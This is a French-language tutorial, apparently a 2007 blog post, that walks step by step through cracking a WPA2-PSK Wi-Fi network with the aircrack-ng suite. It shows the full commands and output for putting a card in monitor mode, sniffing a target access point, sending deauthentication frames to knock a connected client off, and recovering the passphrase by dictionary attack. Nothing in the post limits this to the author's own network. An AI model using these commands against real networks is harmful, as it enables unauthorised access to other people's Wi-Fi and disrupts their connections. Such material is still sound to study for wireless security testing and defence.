Dans un premier temps, il faut installer aircrack-ng.
Nous allons passer la carte wifi en mode monitor c’est a dire (la carte écoute tous les paquets wireless même ceux qui ne lui sont pas destiné.)
Pour cela nous utilisons airmon-ng
fluxdeb:~# airmon-ng
usage: airmon-ng <start|stop> <interface> [channel]
Interface Chipset Driver
wifi0 Atheros madwifi-ng
wifi1 Atheros madwifi-ng
1) Passage en mode Monitor
fluxdeb:~# airmon-ng start wifi1
usage: airmon-ng <start|stop> <interface> [channel]
Interface Chipset Driver
wifi0 Atheros madwifi-ng
wifi1 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi1) (monitor mode enabled)
Lors du passage en mode Monitor airmon crée un interface virtuel ath0. J’utiliserai ath0 pour la suite du cracking.
2) Découverte des réseaux.
La commande airodump-ng permet de « sniffer » le réseaux afin de découvrir les réseaux wifi disponible.
L’utilisation sans argument permet l’écoute sur tout les canaux et de tout les SSID.
Notez qu’il est possible d’utiliser deux interfaces pour sniffer doublant ainsi la rapidité d’obtention de packet.
airodump-ng <options> <interface>[,<interface>,...]
CH 10 ][ Elapsed: 16 s ][ 2007-05-10 15:24
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:16:46:C6:2D:B1 31 28 0 0 13 54. WEP WEP XXXXX 00:16:46:C6:2D:B0 32 27 7 0 13 54. WPA2 CCMP PSK XXXXX
BSSID STATION PWR Lost Packets Probes
Voici donc nos deux réseaux, le réseaux que je vais cracker est 00:16:46:C6:2D:B0
On peut voir qu'il envoie sur le channel 13. Je vais donc demander a airodump-ng d'ecouter exclusivement notre réseau.
airodump-ng -c 13 -b 00:16:46:C6:2D:B0 -w psk ath0
-c : channel a écouter
-b : mac adress de l'ap
-w : fichier ou l'on sauvegarde les IVs
ath0 : interface
J'obtiens donc ceci
CH 13 ][ Elapsed: 4 s ][ 2007-05-10 15:32
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:16:46:C6:2D:B0 33 58 71 115 3 13 54. WPA2 CCMP PSK XXXXXX
BSSID STATION PWR Lost Packets Probes
00:16:46:C6:2D:B0 00:0C:F1:04:77:D2 43 0 79
Ce qui est important ici ce sont les stations connectés au point d'accès
Il y a en a 1 qui est associé. (00:16:46:C6:2D:B0)
3) Création de traffic.
Afin d'accélérer la récolte d'information, je vais forcer le client authentifié à générer du traffic en le déassociant du point d'accès. Pour ce faire il faut utiliser aireplay-ng.
aireplay-ng -0 1 -a 00:16:46:C6:2D:B0 -c 00:0C:F1:04:77:D2 ath0
-0 : type d'attaque ( déassotiation )
1 : nombre de déassotiation à envoyer
-a : mac de l'ap
-c : mac du client authentifié
15:46:14 Sending DeAuth to station -- STMAC: [00:0C:F1:04:77:D2]
Ce résultat creé donc du traffic ce qui vas augmenter nos chances de cracker la psk.
4) Cracking de la PSK
Afin de cracker la psk aircrack utilise une attaque par dictionnaire.
aircrack-ng -w dico /home/corbier/psk-0*.cap
-w : dictionnaire
/home/corbier.psk-0*.cap : fichier contenant les IVs
Read 78425 packets.
# BSSID ESSID Encryption
1 00:16:46:C6:2D:B0 XXXXXX WPA (1 handshake)
Index number of target network ? 1
Aircrack-ng 0.6.2
[00:00:00] 56 keys tested (83.64 k/s)
KEY FOUND! [ ??????????? ]
Master Key : 31 96 83 02 6E 0D A7 0B 7C 42 95 E2 13 50 FE 31
1A 25 44 5E C4 6D C5 74 54 B7 1F 37 7F C6 E4 65
Transcient Key : F4 B4 54 7E 5E 1A 49 F4 2F 0E 1B CA 25 C1 22 09
B7 F6 E1 6F 2A 00 B9 F5 31 5D 7D A6 97 9B D1 7B
7C 67 3C 15 FF C1 5B D4 7B 0A D4 18 A1 3C EA C6
F8 7B A2 8C 9E 7F FA D4 C4 92 AF 06 4C 47 06 9A
EAPOL HMAC : FF 23 6C A2 A6 10 FF E0 A9 53 E0 2E 1F 61 44 BB
Et voila
